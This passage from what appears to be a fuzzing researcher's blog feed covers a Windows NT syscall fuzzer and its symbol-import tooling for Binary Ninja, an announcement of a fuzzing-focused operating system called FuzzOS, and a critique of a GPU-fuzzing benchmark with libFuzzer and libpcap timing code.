<span class="nn">syscall</span><span class="p">::</span><span class="nf">syscall0</span><span class="p">(</span><span class="n">rng</span><span class="nf">.next</span><span class="p">()</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Yep, that’s all it took.</p>
<h2 id="debugging-windows-nt-blue-screens">Debugging Windows NT Blue Screens</h2>
<p>Unfortunately, we’re in a pretty legacy system and our tools for debugging
are limited. Especially for MIPS executables for Windows. Turns out that Ghidra
isn’t able to load MIPS PEs at all, and Binary Ninja has no support for the
debug information.</p>
<p>We started by writing a tool that would scrape the symbol output and
information from <code class="language-plaintext highlighter-rouge">mipskd</code> (which works really similar to modern KD), but
unfortunately one of the members of my chat claimed a chat reward to have me
drop whatever I was doing and rewrite it in Rust.</p>
<p>At the moment we were writing a hacky batch script to dump symbols in a way
we could save to disk, rip out of the VM, and then use in Binary Ninja.
However, well, now I had to do this all in Rust.</p>
<h3 id="parsing-dbg-coff">Parsing DBG COFF</h3>
<p>The debug files that ship with Windows NT on the ISO are <code class="language-plaintext highlighter-rouge">DI</code> magic-ed files.
These are separated debug information with a slightly specialized debug header
with COFF symbol information. This format is actually relatively well
documented, so writing the parser wasn’t too much effort. Most of the
development time was trying to figure out how to correlate source line
information to addresses. Ultimately, the only possible method to do this that
I found was to use the statefulness of the sequence of debug symbol entries to
associate the current file definition (in sequence with debug symbols) with
symbols that are described after it.</p>
<p>I don’t know if this is the correct design, as I didn’t find it documented
everywhere. It is standardized in a few documents, but these DBG files did
not follow that format.</p>
<p>I ultimately wrote <a href="https://github.com/gamozolabs/coff_nm">coff_nm</a> for this
parsing, which simply writes to <code class="language-plaintext highlighter-rouge">stdout</code> with the format:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>F <addr> <function>
G <addr> <global>
S <addr> <source>:<line>
</code></pre></div></div>
<h3 id="binary-ninja">Binary Ninja</h3>
<p><img src="/assets/binja_pinball.png" alt="Binary Ninja with Pinball.exe open and symbolized" /></p>
<p>(Fun fact, yes, you can find PPC, MIPS, and Alpha versions of the Space Cadet
Pinball game you know and love)</p>
<p>I wrote a very simple Binary Ninja script that allowed me to import this debug
information into the program:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">binaryninja</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="nn">re</span><span class="p">,</span> <span class="n">subprocess</span>
<span class="k">def</span> <span class="nf">load_dbg_file</span><span class="p">(</span><span class="n">bv</span><span class="p">,</span> <span class="n">function</span><span class="p">):</span>
<span class="n">rex</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">"^([FGS]) ([0-9a-f]{8}) (.*)$"</span><span class="p">)</span>
<span class="c1"># Prompt for debug file input
</span> <span class="n">dbg_file</span> <span class="o">=</span> <span class="n">interaction</span> \
<span class="p">.</span><span class="n">get_open_filename_input</span><span class="p">(</span><span class="s">"Debug file"</span><span class="p">,</span>
<span class="s">"COFF Debug Files (*.dbg *.db_)"</span><span class="p">)</span>
<span class="k">if</span> <span class="n">dbg_file</span><span class="p">:</span>
<span class="c1"># Parse the debug file
</span> <span class="n">output</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">check_output</span><span class="p">([</span><span class="s">"dbgparse"</span><span class="p">,</span> <span class="n">dbg_file</span><span class="p">]).</span><span class="n">decode</span><span class="p">()</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">output</span><span class="p">.</span><span class="n">splitlines</span><span class="p">():</span>
<span class="p">(</span><span class="n">typ</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="o">=</span> <span class="n">rex</span><span class="p">.</span><span class="n">match</span><span class="p">(</span><span class="n">line</span><span class="p">).</span><span class="n">groups</span><span class="p">()</span>
<span class="n">addr</span> <span class="o">=</span> <span class="n">bv</span><span class="p">.</span><span class="n">start</span> <span class="o">+</span> <span class="nb">int</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span>
<span class="p">(</span><span class="n">mangle_typ</span><span class="p">,</span> <span class="n">mangle_name</span><span class="p">)</span> <span class="o">=</span> <span class="n">demangle</span><span class="p">.</span><span class="n">demangle_ms</span><span class="p">(</span><span class="n">bv</span><span class="p">.</span><span class="n">arch</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">type</span><span class="p">(</span><span class="n">mangle_name</span><span class="p">)</span> <span class="o">==</span> <span class="nb">list</span><span class="p">:</span>
<span class="n">mangle_name</span> <span class="o">=</span> <span class="s">"::"</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">mangle_name</span><span class="p">)</span>
<span class="k">if</span> <span class="n">typ</span> <span class="o">==</span> <span class="s">"F"</span><span class="p">:</span>
<span class="c1"># Function
</span> <span class="n">bv</span><span class="p">.</span><span class="n">create_user_function</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
<span class="n">bv</span><span class="p">.</span><span class="n">define_user_symbol</span><span class="p">(</span><span class="n">Symbol</span><span class="p">(</span><span class="n">SymbolType</span><span class="p">.</span><span class="n">FunctionSymbol</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">mangle_name</span><span class="p">,</span> <span class="n">raw_name</span><span class="o">=</span><span class="n">name</span><span class="p">))</span>
<span class="k">if</span> <span class="n">mangle_typ</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
<span class="n">bv</span><span class="p">.</span><span class="n">get_function_at</span><span class="p">(</span><span class="n">addr</span><span class="p">).</span><span class="n">function_type</span> <span class="o">=</span> <span class="n">mangle_typ</span>
<span class="k">elif</span> <span class="n">typ</span> <span class="o">==</span> <span class="s">"G"</span><span class="p">:</span>
<span class="c1"># Global
</span> <span class="n">bv</span><span class="p">.</span><span class="n">define_user_symbol</span><span class="p">(</span><span class="n">Symbol</span><span class="p">(</span><span class="n">SymbolType</span><span class="p">.</span><span class="n">DataSymbol</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">mangle_name</span><span class="p">,</span> <span class="n">raw_name</span><span class="o">=</span><span class="n">name</span><span class="p">))</span>
<span class="k">elif</span> <span class="n">typ</span> <span class="o">==</span> <span class="s">"S"</span><span class="p">:</span>
<span class="c1"># Sourceline
</span> <span class="n">bv</span><span class="p">.</span><span class="n">set_comment_at</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span>
<span class="c1"># Update analysis
</span> <span class="n">bv</span><span class="p">.</span><span class="n">update_analysis</span><span class="p">()</span>
<span class="n">PluginCommand</span><span class="p">.</span><span class="n">register_for_address</span><span class="p">(</span><span class="s">"Load COFF DBG file"</span><span class="p">,</span> <span class="s">"Load COFF .DBG file from disk"</span><span class="p">,</span> <span class="n">load_dbg_file</span><span class="p">)</span>
</code></pre></div></div>
<p>This simply prompts the user for a file, invokes the <code class="language-plaintext highlighter-rouge">dbgparse</code> tool, parses
the output, and then uses Binary Ninjas demangling to demangle names and
extract type information (for mangled names). This script tells Binja what
functions we know exist, the names of them, and the typing of them (from
mangling information), it also applies symbols for globals, and finally it
applies source line information as comments.</p>
<p>Thus, we now have a great environment for reading and reviewing NT code for
analyzing the crashes we find with our “fuzzer”!</p>
<h2 id="conclusion">Conclusion</h2>
<p>Well, this has gotten a lot longer than expected, and it’s also 5am so I’m just
going to upload this as is, so hopefully it’s not a mess as I’m not reading
through it to check for errors. Anyways, I hope you enjoyed this write up the
3 streams so far on this content. It’s been a really fun project, and I hope
that you tune into my live streams and watch the next steps unfold!</p>
<p>~Gamozo</p>IntroductionFuzzOS2020-12-06T23:11:15+00:002020-12-06T23:11:15+00:00https://gamozolabs.github.io/fuzzing/2020/12/06/fuzzos<h2 id="summary">Summary</h2>
<p>We’re going to work on an <em>operating system</em> which is designed specifically for fuzzing! This is going to be a streaming series for most of December which will cover making a new operating system with a strong focus on fuzzing. This means that things like the memory manager, determinism, and scalability will be the most important parts of the OS, and a lot of effort will go into making them super fast!</p>
<h2 id="when">When</h2>
<p>Streaming will start sometime on Thursday, December 10th, probably around 18:00 UTC, but the streams will be at relatively random times on relatively random days. I can’t really commit to specific times!</p>
<p>Streams will likely be 4-5 days a week (probably M-F), and probably 8-12 hours in length. We’ll see, who knows, depends how much fun we have!</p>
<h2 id="where">Where</h2>
<p>You’ll be able to find the streams live on my <a href="https://twitch.tv/gamozo">Twitch Channel</a>, and if you’re unlucky and miss the streams, you’ll be able to find the recordings on my <a href="https://www.youtube.com/user/gamozolabs">YouTube Channel</a>! Don’t forget to like, comment, and subscribe, of course.</p>
<h2 id="what">What</h2>
<p>So… ultimately, I don’t really know what all will happen. But, I can predict a handful of things that we’ll do. First of all, it’s important to note that these streams are not training material. There is no prepared script, materials, flow, etc. If we end up building something totally different, that’s fine and we’re just going with the flow. There is no requirement of completing this project, or committing to certain ways the project will be done. So… with that aside.</p>
<p>We’ll be working on making an operating system, specifically for x86-64 (Intel flavor processors at the start, but AMD should work in non-hypervisor mode). This operating system will be designed for fuzzing, which means we’ll want to focus on making virtual memory management extremely fast. This is the backbone of most performant fuzzing, and we’ll need to be able to map in, unmap, and restore pages as they are modified by a fuzz case.</p>
<p>To keep you on the edge of your toes, I’ll first start with the boring things that we have to do.</p>
<h3 id="os">OS</h3>
<p>We have to make an operating system which boots. We’re gonna make a UEFI kernel, and we might dabble in running it on ARM64 as most of our code will be platform agnostic. But, who knows. It’ll be a pretty generic kernel, I’m mainly going to develop it on bare metal, but of course, we’ll make sure it runs on KVM/Xen/Hyper-V such that it can be used in a cloud environment.</p>
<h3 id="acpi">ACPI</h3>
<p>We’re gonna need to write ACPI table parsers such that we can find the NUMA locality of memory and CPUs on the system. This will be critical to getting a high performance memory manager that scales with cores.</p>
<h3 id="multi-processing">Multi-processing</h3>
<p>Of course, the kernel will support multiple cores, as otherwise it’s kinda useless for compute.</p>
<h3 id="10gbit-networking--tcp-stack">10gbit networking + TCP stack</h3>
<p>Since I never work with disks, I’m going to follow my standard model of just using the network as general purpose whatever. To do this, we’ll need 10gbit network drivers and a TCP stack such that we can communicate with the rest of a network. Nothing too crazy here, we’ll probably borrow some code from <a href="https://github.com/gamozolabs/chocolate_milk">Chocolate Milk</a></p>
<hr />
<h2 id="interesting-stuff">Interesting stuff</h2>
<p>Okay, that stuff was boring, lets talk about the fun parts!</p>
<h3 id="exotic-memory-model">Exotic memory model</h3>
<p>Since we’ll be “snapshotting” memory itself, we need to make sure things like pointers aren’t a problem. The fastest, easiest, and best solution to this, is simply to make sure the memory always gets loaded at the same address. This is no problem for a single core, but it’s difficult for multiple cores, as they need to have copies of the same data mapped at the same location.</p>
<p>What’s the solution? Well of course, we’ll have every single core on the system running it’s own address space. This means there is no shared memory between cores (with some very, very minor execeptions). Not only does this lead to execeptionally high memory access performance (due to caches only being in the exclusive or shared states), but it also means that shared (mutable) memory will not be a thing! This means that we’ll do all of our core synchronization through message passing, which is higher latency in the best case than shared memory models, but with an advantage of scaling much better. As long as our messages can be serialized to TCP streams, that means we can scale across the network without any effort.</p>
<p>This has some awesome properties since we no longer need any locks to our page tables to add and remove entries, nor do we need to perform any TLB shootdowns, which can cost tens thousands of cycles.</p>
<p>I used this model in <a href="https://gamozolabs.github.io/metrology/2019/08/19/sushi_roll.html">Sushi Roll</a>, and I really miss it. It had incredibly good performance properties and forced a bit more thought about sharing information between cores.</p>
<h3 id="scaling">Scaling</h3>
<p>As with most things I write, linear scaling will be required, and scaling across the network is just implied, as it’s required for really any realistic application of fuzzing.</p>
<h3 id="fast-and-differential-memory-snapshotting">Fast and differential memory snapshotting</h3>
<p>So far, none of these things are super interesting. I’ve had many OSes that do these things well, for fuzzing, for quite a long time. However, I’ve never made these memory management techniques into a true data structure, rather I use them as needed manually. I plan to make the core of this operating system, a combination of Rust procedural macros and virtual memory management tricks to allow for arbitrary data structure to be stored in a tree-shaped checkpointed structure.</p>
<p>This will allow for fast transitions between different state of the structure as they were snapshotted. This will be done by leveraging the dirty bits in the page tables, and creating an allocator that will allocate in a pool of memory which will be saved and restored on snapshots. This memory will be treated as an opaque blob internally, and thus it can hold any information you want, device state, guest memory state, register state, something completely unrelated to fuzzing, won’t matter. To handle nested structures (or more specifically, pointers in structures which are to be tracked), we’ll use a Rust procedural macro to disallow untracked pointers within tracked structures.</p>
<p>Effectively, we’re going to heavily leverage the hardware’s MMU to differentally snapshot, teleport between, and restore blobs of memory. For fuzzing, this is necessary as a way to hold guest memory state and register state. By treating this opaquely, we can focus on doing the MMU aspects really well, and stop worrying about special casing all these variables that need to be restored upon resets.</p>
<h3 id="linux-emulator">Linux emulator</h3>
<p>Okay, so all of that is kinda to make room for developing high performance fuzzers. In my case, I want this mainly for a new rewrite of vectorized emulation, but to make it interesting for others, we’re going to implement a Linux emulator capable of running QEMU.</p>
<p>This means that we’ll be able to (probably staticially only) compile QEMU. Then we can take this binary, and load it into our OS and run QEMU in our OS. This means we can control the syscall responses to the requests QEMU makes. If we do this deterministically (we will), this means QEMU will be deterministic. Which thus means, the guest inside of QEMU will also be deterministic. You see? This is a technique I’ve used in the past, and works exceptionally well. We’ll definitely outperform Linux’s handling of syscalls, and we’ll scale better, and we’ll blow Linux away when it comes to memory management.</p>
<h3 id="kvm-emulator--hypervisor">KVM emulator + hypervisor</h3>
<p>So, I have no idea how hard this would be, but from about 5 minutes of skimming the interwebs, it seems that I could pretty easily write a hypervisor in my OS that emulates KVM ioctls. Meaning QEMU would just think KVM is there, and use it!</p>
<p>This will give us full control of QEMU’s determinism, syscalls, performance, and reset speeds… without actually having to modify QEMU code.</p>
<h2 id="thats-it">That’s it</h2>
<p>So that’s the plan. An OS + fast MMU code + hypervisor + Linux emulator, to allow us to deterministically run anything QEMU can run, which is effectively everything. We’ll do this with performance likely into the millions of VM resets per second per core, scaling linearly with cores, including over the network, to allow some of the fastest general purpose fuzzing the world has ever seen :D</p>
<h2 id="faq">FAQ</h2>
<p>Some people have asked questions on the internet, and I’ll post them here:</p>
<h3 id="hackernews-q1">Hackernews Q1</h3>
<p>Q:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Huh. So my initial response was, "why on earth would you need a whole OS for that", but memory snapshotting and improved virtual memory performance might actually be a good justification. Linux does have CRIU which might be made to work for such a purpose, but I could see a reasonable person preferring to do it from a clean slate. On the other hand, if you need qemu to run applications (which I'm really unclear about; I can't tell if the plan is to run stuff natively on this OS or just to provide enough system to run qemu and then run apps on linux on qemu) then I'm surprised that it's not easier to just make qemu do what you want (again, I'm pretty sure qemu already has its own memory snapshotting features to build on).
Of course, writing an OS can be its own reward, too:)
</code></pre></div></div>
<p>A:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Oooh, wasn't really expecting this to make it to HN cause it was meant to be more of an announcement than a description.
But yes, I've done about 7 or 8 operating systems for fuzzing in the past and it's a massive performance (and cleanliness) cleanup. This one is going to be like an operating system I wrote 2-3 years ago for my vectorized emulation work.
To answer your QEMU questions, the goal is to effectively build QEMU with MUSL (just to make it static so I don't need a dynamic loader), and modify MUSL to turn all syscalls to `call` instructions. This means a "syscall" is just a call to another area, which will by my Rust Linux emulator. I'll implement the bare minimum syscalls (and enum variants to those syscalls) to get QEMU to work, nothing more. The goal is not to run Linux applications, but run a QEMU+MUSL combination which may be modified lightly if it means a lower emulation burden (eg. getting rid of threading in QEMU [if possible] so we can avoid fork())
The main point of this isn't performance, it's determinism, but that is a side effect. A normal syscall instruction involves a context switch to the kernel, potentially cr3 swaps depending on CPU mitigation configuration, and the same to return back. This can easily be hundreds of cycles. A `call` instruction to something that handles the syscall is on the order of 1-4 cycles.
While for syscalls this isn't a huge deal, it's even more emphasized when it comes to KVM hypercalls. Transitions to a hypervisor are very expensive, and in this case, the kernel, the hypervisor, and QEMU (eg. device emulation) will all be running at the same privilege level and there won't be a weird QEMU -> OS -> KVM -> other guest OS device -> KVM -> OS -> QEMU transition every device interaction.
But then again, it's mainly for determinism. By emulating Linux deterministically (eg. not providing entropy through times or other syscall returns), we can ensure that QEMU has no source of external entropy, and thus, will always do the same thing. Even if it uses a random-seeded hash table, the seed would be derived from syscalls, and thus, will be the same every time. This determinism means the guest always will do the same thing, to the instruction. Interrupts happen on the same instructions, context switches do, etc. This means any bug, regardless of how complex, will reproduce every time.
All of this syscall emulation + determinism I have also done before, in a tool called tkofuzz that I wrote for Microsoft. That used Linux emulation + Bochs, and it was written in userspace. This has proven incredibly successful and it's what most researchers are using at Microsoft now. That being said, Bochs is about 100x slower than native execution, and now that people have gotten a good hold of snapshot fuzzing (there's a steep learning curve), it's time to get a more performant implementation. With QEMU with get this with a JIT, which at least gets us a 2-5x improvement over Bochs while still "emulating", but even more value could be found if we get the KVM emulation working and can use a hypervisior. That being said, I do plan to support a "mode" where guests which do not touch devices (or more specifically, snapshots which are taken after device I/O has occurred) will be able to run without QEMU at all. We're really only using QEMU for device emulation + interrupt control, thus, if you take a snapshot to a function that just parses everything in one thread, without process IPC or device access (it's rare, when you "read" from a disk, you're likely just hitting OS RAM caches, and thus not devices), we can cut out all the "bloat" of QEMU and run in a very very thin hypervisor instead.
In fuzzing it's critical to have ways to quickly map and unmap memory as most fuzz cases last for hundreds of microseconds. This means after a few hundred microseconds, I want to restore all memory back to the state "before I handled user input" and continue again. This is extremely slow in every conventional operating system, and there's really no way around it. It's of course possible to make a driver or use CRIU, but these are still not exactly the solution that is needed here. I'd rather just make an OS that trivially runs in KVM/Hyper-V/Xen, and thus can run in a VM to get the cross-platform support, rather than writing a driver for every OS I plan to use this on.
Stay cute, ~gamozo
</code></pre></div></div>
<hr />
<h2 id="social">Social</h2>
<p>I’ve been streaming a lot more regularly on my <a href="https://twitch.tv/gamozo">Twitch</a>! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!</p>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when
new blogs come up. I often will post data and graphs from data as it comes in
and I learn!</p>SummarySome thoughts on ToB’s GPU-based fuzzing2020-10-23T07:11:15+00:002020-10-23T07:11:15+00:00https://gamozolabs.github.io/2020/10/23/some_thoughts_on_gpu_fuzzing<h2 id="the-blog">The blog</h2>
<p>The blog we’re looking at today is an incredible blog by Ryan Eberhardt on the Trail of Bits blog! You should read it first, it’s really neat, there’s also some awesome graphics in it which makes it a super fun read!</p>
<p><a href="https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/">Let’s build a high-performance fuzzer with GPUs!</a></p>
<h2 id="summary">Summary</h2>
<p>In the ToB blog, they talk about using GPUs to fuzz. More specifically, they talk about lifting a target architecture into LLVM IR, and then emitting the LLVM IR to a binary which can run on a GPU. In this case, they’re targeting PTX assembly to run on the NVIDIA Tesla T4 GPU. This is done using a tool ToB has been working on for quite a while, called <a href="https://github.com/lifting-bits/remill">remill</a>, which is designed for binary translation. Remill alone is incredibly impressive.</p>
<p>The target they picked as a benchmark is the BFP packet filtering code in libpcap, <a href="https://github.com/the-tcpdump-group/libpcap/blob/505e35489a11a8dbbd5e3909e587608b7903eb5b/bpf_filter.c#L75"><code class="language-plaintext highlighter-rouge">pcap_filter_with_aux_data</code></a>. This function is pretty simple, and it executes a compiled BPF filter and uses it to extract information and filter a packet.</p>
<p>The blog talks about some of the hurdles in getting performant execution on GPUs, organization of data, handing virtual memory, etc. Once again, go read it. It’s really neat, the graphics alone make it a worthwhile read!</p>
<p>I’m super excited about this blog, mainly because it’s very similar to vectorized emulation that I’ve worked on in the past, and it starts answering questions about GPU-based fuzzing that I have been too lazy to look into. While this blog goes into some criticisms, it’s important to note that the research is only just starting, there is much progress to be had! It’s also important to note that this research has been being done by Ryan for only 2 months. That is incredible progress.</p>
<hr />
<h2 id="the-problems">The Problems</h2>
<p>Nevertheless, I have a few problems with the blog that stood out to me. I’m kind of always the asshole pointing these things out, but I think there are some important things to discuss.</p>
<h1 id="the-comparison">The comparison</h1>
<p>In the blog, the comparison being done and being presented is largely about comparing the performance of <a href="https://www.llvm.org/docs/LibFuzzer.html">libfuzzer</a>, against their GPU based fuzzer. Further, the comparisons are largely about the number of executions per second (or as I call them, fuzz cases per second), per unit US dollar. This comparison is largely to emphasize the cost efficiencies of fuzzing on the GPU, so we’ll keep that in mind. We don’t want to stray too far from their actual point.</p>
<p>Their hardware they’re testing on are 2 different Google Cloud Compute nodes which have various specs. The one used to benchmark libfuzzer is an <code class="language-plaintext highlighter-rouge">n1-standard-8</code>, this is a 4 core, 8 hyperthread, Intel Skylake machine. This costs $0.38/hour according to their blog, and of course, this checks out.</p>
<p>The other machine they’re testing on, for their GPU metrics, is a NVIDIA Tesla T4 single GPU compute node from Google Cloud Project. They claim this costs $0.35/hour, and once again, that’s accurate. This means the two machines are effectively the same price, and we’ll be able to compare them at a rough level without really taking into consideration their costs.</p>
<p>In their blog, they mention that “This isn’t an entirely fair comparison.”, and this is largely referring to that their fuzzer is not providing mutated inputs to the function, whereas libfuzzer is. This is a major issue. However, their fuzzer is resetting the state of the target every fuzz case, and libfuzzer is relying on the function not having any peristant state that needs to be reset. This gives libfuzzer a large advantage. Finally, the GPU based fuzzer also works on binaries, where libfuzzer requires source, so once again, there’s a lot of variables at play here. It is important to note, they’re mainly looking for order-of-magnitude estimates. But… this is a lot more than should be controlled for in my opinion. Important to also note that the blog concludes with a ~4x improvement from libfuzzer, thus, it’s well below the order-of-magnitude concerns of unfairness.</p>
<p>Of course, if you’ve read my blogs before. You’ll know I absolutely hate comparisons between problems with multiple variables. First of all, the cost of mutating an input is incredibly expensive, especially for a potentially large packet, say 1500 bytes. Further, the target which is being picked is a single function which does very little processing from first glance, but we’ll look into this more later.</p>
<p>So, let’s start off by eliminating one variable right away. What <em>is</em> the cost of generating an input from libfuzzer, and what is the cost of the actual function under test. This will effectively tell us how “fair” the execution comparison is, the binary vs source is subjective and clearly the binary-based engine is more impressive.</p>
<p>How do we do this? Well, let’s first figure out how fast libfuzzer can execute something that does literally nothing. This will give us a baseline of libfuzzer performance given it’s targeting something that does literally nothing.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <stdint.h>
</span>
<span class="k">extern</span> <span class="kt">int</span> <span class="nf">LLVMFuzzerTestOneInput</span><span class="p">(</span><span class="k">const</span> <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">Data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">Size</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// Non-zero return values are reserved for future use.</span>
<span class="p">}</span>
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>clang-12 <span class="nt">-fsanitize</span><span class="o">=</span>fuzzer <span class="nt">-O2</span> test.c
</code></pre></div></div>
<p>We’ll run this test on a <code class="language-plaintext highlighter-rouge">Intel(R) Xeon(R) Gold 6252N CPU @ 2.30GHz</code> turboing to 3.6 GHz. This isn’t the same as their GCP setup, but we’ll do some of our own comparisons locally, thus we’re talking about relatives and not absolutes.</p>
<p>They don’t talk much in their blog about what they used to seed libfuzzer, so we’ll just give it no seeds and cap the input size to 1500 bytes, or about a single MTU for a network packet.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pleb@grizzly:~/libpcap/harness$ ./a.out -max_len=1500
INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 2252408900
INFO: Loaded 1 modules (1 inline 8-bit counters): 1 [0x4ea0b0, 0x4ea0b1),
INFO: Loaded 1 PC tables (1 PCs): 1 [0x4c0840,0x4c0850),
INFO: A corpus is not provided, starting from an empty corpus
#2 INITED cov: 1 ft: 1 corp: 1/1b exec/s: 0 rss: 27Mb
#8388608 pulse cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 4194304 rss: 28Mb
#16777216 pulse cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3355443 rss: 28Mb
#33554432 pulse cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3050402 rss: 28Mb
#67108864 pulse cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3195660 rss: 28Mb
#134217728 pulse cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3121342 rss: 28Mb
</code></pre></div></div>
<p>Hmm, it seems it has settled in at about 3.12 million executions per second on a single core. Hmm, that seems a bit fast compared to the 1.9 million executions per second they see on their 8 thread machine in GCP, but maybe the target is really that complex and slows down performance.</p>
<p>Next, lets see how expensive the target code is outside of libfuzzer.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="n">Instant</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">pcap_sys</span><span class="p">::</span><span class="o">*</span><span class="p">;</span>
<span class="nd">#[link(name</span> <span class="nd">=</span> <span class="s">"pcap"</span><span class="nd">)]</span>
<span class="k">extern</span> <span class="p">{</span>
<span class="k">fn</span> <span class="nf">bpf_filter_with_aux_data</span><span class="p">(</span>
<span class="n">pc</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="n">bpf_insn</span><span class="p">,</span>
<span class="n">p</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span>
<span class="n">wirelen</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">buflen</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">aux_data</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span>
<span class="p">);</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="k">const</span> <span class="n">ITERS</span><span class="p">:</span> <span class="nb">u64</span> <span class="o">=</span> <span class="mi">100_000_000</span><span class="p">;</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">program</span><span class="p">:</span> <span class="n">bpf_program</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">mem</span><span class="p">::</span><span class="nf">zeroed</span><span class="p">();</span>
<span class="c">// Ethernet linktype + 1500 snapshot length</span>
<span class="k">let</span> <span class="n">pcap</span> <span class="o">=</span> <span class="nf">pcap_open_dead</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1500</span><span class="p">);</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="o">!</span><span class="n">pcap</span><span class="nf">.is_null</span><span class="p">());</span>
<span class="c">// Compile the program</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">pcap_compile</span><span class="p">(</span><span class="n">pcap</span><span class="p">,</span> <span class="o">&</span><span class="k">mut</span> <span class="n">program</span><span class="p">,</span>
<span class="s">"dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or </span><span class="err">\</span><span class="s">
atalk or aarp or decnet or iso or stp or ipx</span><span class="se">\0</span><span class="s">"</span>
<span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="mi">_</span><span class="p">,</span>
<span class="mi">1</span><span class="p">,</span> <span class="n">PCAP_NETMASK_UNKNOWN</span><span class="p">);</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="n">status</span> <span class="o">==</span> <span class="mi">0</span><span class="p">,</span> <span class="s">"Failed to compile pcap thingy"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">buf</span> <span class="o">=</span> <span class="nd">vec!</span><span class="p">[</span><span class="mi">0u8</span><span class="p">;</span> <span class="mi">1500</span><span class="p">];</span>
<span class="k">let</span> <span class="n">time</span> <span class="o">=</span> <span class="nn">Instant</span><span class="p">::</span><span class="nf">now</span><span class="p">();</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">ITERS</span> <span class="p">{</span>
<span class="c">// Filter a packet</span>
<span class="nf">bpf_filter_with_aux_data</span><span class="p">(</span>
<span class="n">program</span><span class="py">.bf_insns</span><span class="p">,</span>
<span class="n">buf</span><span class="nf">.as_ptr</span><span class="p">(),</span>
<span class="n">buf</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">buf</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span>
<span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">null</span><span class="p">()</span>
<span class="p">);</span>
<span class="p">}</span>
<span class="k">let</span> <span class="n">elapsed</span> <span class="o">=</span> <span class="n">time</span><span class="nf">.elapsed</span><span class="p">()</span><span class="nf">.as_secs_f64</span><span class="p">();</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"{:14.2} packets/second</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ITERS</span> <span class="k">as</span> <span class="nb">f64</span> <span class="o">/</span> <span class="n">elapsed</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
